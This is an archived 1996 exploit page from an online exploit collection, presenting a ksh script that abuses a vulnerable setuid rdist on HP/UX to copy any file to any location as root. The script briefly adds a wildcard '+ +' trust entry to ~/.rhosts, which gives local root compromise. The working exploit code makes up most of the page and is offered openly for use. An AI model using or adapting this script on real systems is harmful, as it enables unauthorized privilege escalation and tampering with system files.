HP/UX Rdist exploit

Summary
Description:SOD HP/UX rdist exploit
Author:Colonel Panic of SOD (sod@command.com.inter.net)
Compromise: root (local)
Vulnerable Systems:HP/UX with vulnerable rdist, probably 9.x 10.x
Date:10 August 1996
Notes:See the SOD HP Bug of the Week page
Details

Exploit:

#!/bin/ksh

# SOD rdist exploit for HP/UX 10.X
# Boner 10Aug96

if [ -z "$2" ]
then
  echo "usage: rdcp from to"
  exit
fi

FROM=$1
TO=$2
TMP=/tmp/.tmp$$
HOME=`pwd`

if [ "${FROM}" = "${FROM#/}" ]
then
  FROM=$HOME/$FROM
fi

echo '+ +' >> ~/.rhosts

echo "Copying $FROM to $TO"
rdist -f - << EOF > /dev/null 2>&1
${FROM} -> localhost
        install ${TMP};
EOF
mv ${TMP} ${TO}
grep -v "+ +" ~/.rhosts > $TMP
mv ${TMP} ~/.rhosts
if [ -f ${TMP} ]; then rm ${TMP}; fi


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault